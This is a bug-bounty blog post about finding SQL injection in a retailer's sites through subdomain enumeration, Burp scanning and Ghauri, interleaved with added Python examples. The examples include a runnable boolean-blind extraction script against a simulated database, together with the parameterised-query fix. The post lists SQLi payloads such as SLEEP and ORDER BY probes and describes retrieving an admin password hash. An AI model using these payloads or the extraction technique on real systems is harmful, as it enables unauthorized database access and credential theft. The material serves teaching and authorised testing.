How I Got Owned A Multi-Billion Dollar Retailer's MySQL Databases Using Simple SQL Injection by Nav1n? Mar, 2023 Medium
This is my first article on Medium. I normally hate writing blogs these days, as I'm
very active on Twitter sharing my bug bounty experience and tips when I find something
interesting. I'm not a good writer either, so if you find typos or grammatical errors
please pardon me.
1 of 13 20-04-2023, 11:35 am
How I got Owned A Multi-Billion Dollar Retailer’s MySQL Databases... https://medium.com/@nav1n/how-i-got-owned-a-multi-billion-dollar-ret...
I didn't use any special tools or techniques, only the ones each and every bug bounty
hunter uses every day.
Keep reading the story of one of my best discoveries ever (I guess!). The post, I
believe, is a little lengthy; skip the beginning part if you do not wish to read the
blah-blahs.
Disclaimer: The article below is for educational purposes only. I in no way endorse
hacking, or unethical ways to hack/test a website, unless you have obtained
permission to do so.
I ran some of the dorks and found hundreds of targets, but most of them are VDPs
with Hall of Fame (HoF) entries and no rewards. I kept looking and found this non-English
target. They had a security.txt page which said the scope applies to all of their group
of companies' web assets, including the international ones. The reward table said they
offer up to 3.5K EUR for SQLi and RCE and 500 for XSS etc., so I decided to work on this
target hoping to find some SQLi or RCE/CVEs.
#1 Subdomain Enumeration:
My methodology is to find as many subdomains as possible if the target is huge
and allows subdomain enumeration. To enumerate subdomains, I prefer Netlas,
crt.sh and securitytrails.com.
I agree that the SecurityTrails service charge is very expensive if you compare it to a
lot of alternatives, but their free tier gives 50 API calls with unlimited subdomain
search per month.
Netlas:
https://app.netlas.io/certs/?q=certificate.subject.organization%3A%22Microsoft%20Corpora
SecurityTrails:
Once I have the list from the CT logs, I head to SecurityTrails, where I use the
following curl command (not mine, I found it in a Discord server) to find subdomains
of their main website.
The script returns around 2k subdomains. I copied all of them to my Excel sheet and
filtered out the duplicates.
Funny part: I still use Excel to remove duplicates from my huge lists. I believe this
is the best and most efficient way, at least for me ;)
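The crt.sh step above returns one JSON object per certificate, with several names packed into a single newline-separated `name_value` field, wildcards such as `*.shop.example.com`, and the occasional out-of-scope look-alike. The function below, added here as an example and not code from the original post, does the parse-normalize-deduplicate pass that the post does by hand in Excel. The `example.com` scope, the sample JSON and the `crtsh_url` helper are constructed for the example; only the crt.sh query format and the `name_value` field are real.

```python
"""Parse crt.sh JSON output into a deduplicated, in-scope subdomain list."""
import json

# Constructed sample of what crt.sh returns for ?q=%25.example.com&output=json:
# one object per certificate, names newline-separated inside "name_value".
SAMPLE_CRTSH_JSON = json.dumps([
    {"name_value": "www.example.com\nexample.com"},
    {"name_value": "*.shop.example.com"},            # wildcard cert
    {"name_value": "API.Example.com"},               # mixed case
    {"name_value": "www.example.com"},               # duplicate
    {"name_value": "evil.example.com.attacker.net"}, # out of scope look-alike
    {"name_value": "staging.example.com\nstaging.example.com"},
])


def crtsh_url(domain):
    """Real crt.sh query format; %25 is the URL-encoded '%' SQL wildcard."""
    return f"https://crt.sh/?q=%25.{domain}&output=json"


def parse_crtsh(raw_json, domain):
    """Return sorted, unique, lower-cased hostnames that end in the scope domain.

    Wildcard prefixes are stripped, and names that merely *contain* the scope
    domain (evil.example.com.attacker.net) are rejected by the suffix check.
    """
    domain = domain.lower()
    scope_suffix = "." + domain
    names = set()
    for entry in json.loads(raw_json):
        for name in entry.get("name_value", "").split("\n"):
            name = name.strip().lower()
            if name.startswith("*."):
                name = name[2:]
            if not name:
                continue
            if name == domain or name.endswith(scope_suffix):
                names.add(name)
    return sorted(names)


if __name__ == "__main__":
    print(crtsh_url("example.com"))
    for host in parse_crtsh(SAMPLE_CRTSH_JSON, "example.com"):
        print(host)
```

Pipe the real response through `parse_crtsh` (one call per root domain in the program's scope) and write the result to the file you feed into httpx; the suffix check is what keeps a third party's certificate that mentions your target from landing in the probe list.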
#3 HTTP Probing:
Now I have exactly 3154 unique subdomains. I copied them to my Kali machine and
ran httpx against them; in return, I got 2892 URLs in the basket that are ready
Since my target is huge and ParamSpider by default supports only a single URL (I do
not understand why you do this to us @0xAsm0d3us), I had to find an alternative
way to achieve this.
I found a piece of script with my old friend. This script takes a list of URLs, sends
it through xargs, removes duplicates and gives you a list. I had some errors while
running it, but the list was ready.
The results were shocking: I now have a whopping one million, seven hundred and
ninety-six thousand, one hundred and forty-nine (1,796,149) lines…
The file size itself is ~96 MB. I thought it was not a wise idea to run all of them
through Burp Suite or SQLMAP, because Kali and the host would eat up a lot of resources
and eventually crash, so I decided to break the file into multiple smaller files
of 10 MB each and work on them one by one.
I set up my Burp Suite and started scanning the small list. I started to get a lot of
low-hanging issues like open redirect, CORS, and even a few XSS, but no high or critical
issues.
Note: A lot of readers asked me how it is possible to scan multiple URLs in Burp
Suite. Yes, it's possible with the Burp Suite Professional version; here is some more
information: https://portswigger.net/blog/launching-scans.
I didn't get major vulns in the first file, so I let Burp do its job on the second
file and took my wife and kids for a weekend dinner. When we returned after 3–4
hours, Burp was still running, but a red exclamation icon was flashing with the
issue type (SQL Injection).
Burp Suite finally found a boolean-based SQL injection for me. I checked the server
and it's Apache. I sent the vulnerable URL to Repeater with multiple sleep payloads like:
1'XOR(SELECT(1)FROM(SELECT(SLEEP(8)))a)XOR'Z
1' ORDER BY 1--+
1 or sleep(5)
but sadly I was getting a JSON message saying “Success” from the server. It seems the
WAF/server was doing some kind of sanitization of known SQLi payloads.
#4 First Breakthrough
I spent an hour trying different methods to see at least an error or to execute sleep();
nothing worked. The GET request didn't work, so I decided to change the request to
POST and sent the simple payload 1=1' as the value of the parameter, and voila, here I
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL
syntax; check the manual that corresponds to your MySQL server version for the right
syntax to use near ''1=1''))
Now I know SQL injection is possible on this site. Before moving to SQLMAP, I
wanted to see how many endpoints were using this vulnerable parameter, so I extended
my search in Kali and grepped for the parameter “xxx”. I found that only 4 out of the
2892 geographically based subdomains were using this parameter. When I opened the links
to see if there were any forms or input fields, I was redirected to the homepage. This
confirmed the page is not active anymore.
When I checked archive.org, I found a cached version that showed me the page is a
kind of user-experience-enhancing suggestion page, mostly in a foreign language. I left
archive.org and headed back to my Kali VM.
I copied the request into a file and ran SQLMAP with the bare minimum flags (-r
request.txt -p xxx --random-agent). It failed to find the injection; I got multiple
errors, 500, 4xx etc., and unfortunately SQLMAP failed me every time.
In a recent tweet I asked for help from the community on a similar situation.
There were some good suggestions, but none of them worked here except the one
https://twitter.com/nav1n0x/status/1630627895952527361
I sent the same request to Ghauri and here is the result. Ghauri took just 4 minutes
to find the injection: time-based blind and boolean-based blind SQL injection.
Now it was time to retrieve the database name to prove the exploit. I ran the following
command:
And here I have the nice, beautiful xxx*** database name, which suggests the DB is a
production database.
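Two things happen in the passage above that are worth seeing end to end: a stray quote (`1=1'`) turning into a server-side syntax error, which proves the input reaches the query unescaped, and a boolean-based blind oracle (the "Success" response either carrying rows or not) being used to read the database name one character at a time, which is what Ghauri automated. The script below is an added example, not the author's or Ghauri's code, and it simulates the endpoint with an in-memory sqlite3 database rather than MySQL. Everything about the target is assumed: the `id IN ('...')` query shape is inferred from the `'1=1''))` fragment in the error message; the `db_meta` table stands in for MySQL's `database()`; sqlite's `unicode()`/`substr()`/`length()` stand in for MySQL's `ascii()`/`substr()`/`length()`; the item rows and the `shop_prod` name are constructed.

```python
"""Simulated vulnerable endpoint plus boolean-based blind extraction against it.

sqlite3 stands in for MySQL so the example runs offline; see the comments for
the MySQL equivalents of each sqlite function used in the payloads.
"""
import sqlite3

# Constructed fixture. 'db_meta' plays the role of MySQL's database() because
# sqlite has no function that returns a schema name.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
CREATE TABLE items (id TEXT, name TEXT);
INSERT INTO items VALUES ('1', 'first'), ('2', 'second');
CREATE TABLE db_meta (name TEXT);
INSERT INTO db_meta VALUES ('shop_prod');
""")


def vulnerable_lookup(value):
    """The bug: user input is concatenated into the SQL text.

    Returns the JSON-like dict the endpoint would send back. Mirrors the post's
    behaviour: a well-formed query answers "Success", a malformed one leaks the
    driver error (MySQL would say error 1064; sqlite says 'unrecognized token').
    """
    sql = f"SELECT name FROM items WHERE id IN ('{value}')"
    try:
        rows = _conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return {"status": "Error", "message": str(exc)}
    return {"status": "Success", "count": len(rows)}


def safe_lookup(value):
    """The fix: bind the value as a parameter, so quotes are data, not syntax."""
    rows = _conn.execute(
        "SELECT name FROM items WHERE id IN (?)", (value,)
    ).fetchall()
    return {"status": "Success", "count": len(rows)}


def oracle(condition):
    """Boolean oracle: does the injected condition leave the known row in place?

    Payload closes the quoted value and the IN() list, ANDs in our condition,
    then comments out the original trailing quote and parenthesis.
    """
    payload = f"1') AND ({condition}) -- "
    resp = vulnerable_lookup(payload)
    return resp.get("status") == "Success" and resp.get("count", 0) > 0


def blind_int(expr, lo, hi):
    """Binary-search the integer value of a SQL expression in [lo, hi]
    using only 'expr > mid' yes/no answers: ~log2(hi-lo) requests per value."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


# On MySQL this would simply be "database()".
DB_NAME_EXPR = "(SELECT name FROM db_meta)"


def extract_db_name():
    """Recover the database name: first its length, then each character's
    code point (printable ASCII 32..126). MySQL: ascii(substr(database(),i,1))."""
    length = blind_int(f"length({DB_NAME_EXPR})", 0, 64)
    chars = []
    for i in range(1, length + 1):
        code = blind_int(f"unicode(substr({DB_NAME_EXPR}, {i}, 1))", 32, 126)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    print("1=1' via vulnerable endpoint:", vulnerable_lookup("1=1'"))
    print("1=1' via parameterised endpoint:", safe_lookup("1=1'"))
    print("blind-extracted database name:", extract_db_name())
```

The detection step and the extraction step rely on the same defect: the quote in `1=1'` breaks the query only because the value was spliced into the SQL string, and `safe_lookup` shows the one-line change that makes both the error and the oracle disappear. The binary search is why a tool can pull a name out of a blind endpoint in minutes: seven requests per character instead of up to ninety-five.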
I ran Ghauri on all the endpoints and received different databases, including staging
Winner:
SQLMAP: 0 | Ghauri: 1
As the column p***_***_** is present, I know I could be the new owner of the database
:), but I just want the bounty, not the database.
aaand here it is. I now have the admin password hash and the password, which
would let me own any of their databases from 3 major eStores.
I humbly sent them a detailed report on my findings and my analysis. I got the reply on
Monday evening (time difference) asking to see if there are more vulnerable
parts, but I couldn't find any.
The same night I was told the vulnerability had been accepted. They are internally
discussing the bounty and possibly applying the fix. I reported 4 SQL injections,
3 XSS and an open redirect; I'm expecting a payout of at least 4.5K EUR.
That’s all.
Takeaways:
3. Archive.org has more vulnerable endpoints cached than the live ones.
4. If the GET request didn't work, try POST, and change the protocol version
(HTTP/1.0 or HTTP/2) to see if it helps.
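Takeaway 3 is the step that found the dead suggestion page: the live site redirected to the homepage, but the Wayback Machine still had the parameterised URL. The Wayback CDX index can be queried for every archived URL under a host, and the helper below, added here as an example and not part of the original post, builds that query and then does the "grep for the parameter" pass over the result, grouping archived endpoints by query-parameter name. The `example.com` hosts and the sample CDX lines are constructed; `xxx` is the post's own redacted parameter name; the CDX API parameters (`url`, `output`, `fl`, `filter`, `collapse`) are real.

```python
"""Find historical parameterised endpoints via the Wayback Machine CDX index."""
from urllib.parse import parse_qs, urlencode, urlparse


def cdx_query_url(domain):
    """Build a CDX query for every archived URL under `domain`.

    fl=original returns only the archived URL, filter=statuscode:200 drops
    redirects and errors, collapse=urlkey keeps one capture per distinct URL.
    """
    params = {
        "url": f"{domain}/*",
        "output": "txt",
        "fl": "original",
        "filter": "statuscode:200",
        "collapse": "urlkey",
    }
    return "http://web.archive.org/cdx/search/cdx?" + urlencode(params)


# Constructed sample of the newline-separated 'original' column the query
# above returns; in practice this is the body of the HTTP response.
SAMPLE_CDX = """\
https://www.example.com/
https://www.example.com/suggest.php?xxx=12&lang=de
https://www.example.com/suggest.php?xxx=99
https://fr.example.com/suggest.php?lang=fr&xxx=3
https://www.example.com/static/app.js
https://www.example.com/search?q=shoes
"""


def endpoints_by_param(cdx_text):
    """Map each query-parameter name to the set of host+path endpoints using it.

    Parameter values are deliberately discarded: the interesting unit for
    re-testing is 'which endpoints accept parameter X', not the archived values.
    """
    result = {}
    for line in cdx_text.splitlines():
        line = line.strip()
        if not line:
            continue
        url = urlparse(line)
        for name in parse_qs(url.query, keep_blank_values=True):
            result.setdefault(name, set()).add(f"{url.netloc}{url.path}")
    return result


def grep_param(cdx_text, param):
    """Sorted list of archived endpoints that take `param`, like the post's grep."""
    return sorted(endpoints_by_param(cdx_text).get(param, set()))


if __name__ == "__main__":
    print(cdx_query_url("example.com"))
    for endpoint in grep_param(SAMPLE_CDX, "xxx"):
        print(endpoint)
```

Run the generated CDX URL with curl, feed the body to `grep_param`, and you get the archived endpoints to replay against the live host; as in the post, an endpoint that now redirects to the homepage can still execute the query behind it.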
Thank you for reading. I will come back soon with another interesting story of
multiple Log4Shell findings on a major sports goods manufacturer's web app.